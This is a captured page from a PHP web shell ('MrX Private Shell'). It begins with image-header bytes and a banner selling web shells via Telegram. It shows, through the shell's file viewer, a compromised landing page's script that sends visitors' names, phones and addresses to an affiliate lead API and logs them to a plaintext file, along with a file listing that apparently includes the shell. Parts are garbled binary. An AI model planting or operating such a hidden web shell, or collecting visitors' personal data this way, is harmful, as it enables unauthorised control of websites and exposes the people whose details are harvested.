����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
if (basename($_SERVER['SCRIPT_FILENAME']) === basename(__FILE__)) {
header('HTTP/1.0 403 Forbidden');
exit('Access denied.');
}
?>
<?php
session_start();
$_SESSION['country'] = 'HR';
$_SESSION['name'] = $_POST['name'];
$_SESSION['phone'] = $_POST['phone'];
if (!isset($_POST['name']) || !isset($_POST['phone']))
if (isset($_SERVER['HTTP_REFERER']))
header("Location: ".$_SERVER['HTTP_REFERER']);
else
header("Location: index.html");
$params = array(
'flow_hash' => 'jnDu',//тут хеш
'landing' => 'hu50.landril.com',//оригинал ленда в пп
'referrer' => $_SERVER['HTTP_REFERER'],
'phone' => $_REQUEST['phone'],
'name' => $_REQUEST['name'],
'country' => 'HR',
'address' => $_REQUEST['address'],
'email' => $_REQUEST['email'],
'lastname' => $_REQUEST['lastname'],
'comment' => $_REQUEST['comment'],
'layer' => $_REQUEST['layer'],
'sub1' => $_REQUEST['sub1'],
'sub2' => $_REQUEST['sub2'],
'sub3' => $_REQUEST['sub3'],
'sub4' => $_REQUEST['sub4'],
'sub5' => $_REQUEST['sub5'],
);
$url = "http://wapi.leadbit.com/api/pub/new-order/_68c7fcae8cb8c489281602";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_REFERER, $url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
$return= json_decode(curl_exec($ch), true);
curl_close($ch);
$timestamp = date("H:i:s d-m-Y");
file_put_contents('mes.txt', "Время: {$timestamp} Имя: {$_POST['name']} Телефон: {$_POST['phone']}\n", FILE_APPEND);
header("Location: thankyou-page/thankyou.php");| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| css | Folder | 0755 |
|
|
| fonts | Folder | 0755 |
|
|
| images | Folder | 0755 |
|
|
| js | Folder | 0755 |
|
|
| thankyou-page | Folder | 0755 |
|
|
| api.php | File | 1.7 KB | 0644 |
|
| mes.txt | File | 75 B | 0644 |
|
| poi.php | File | 116.46 KB | 0644 |
|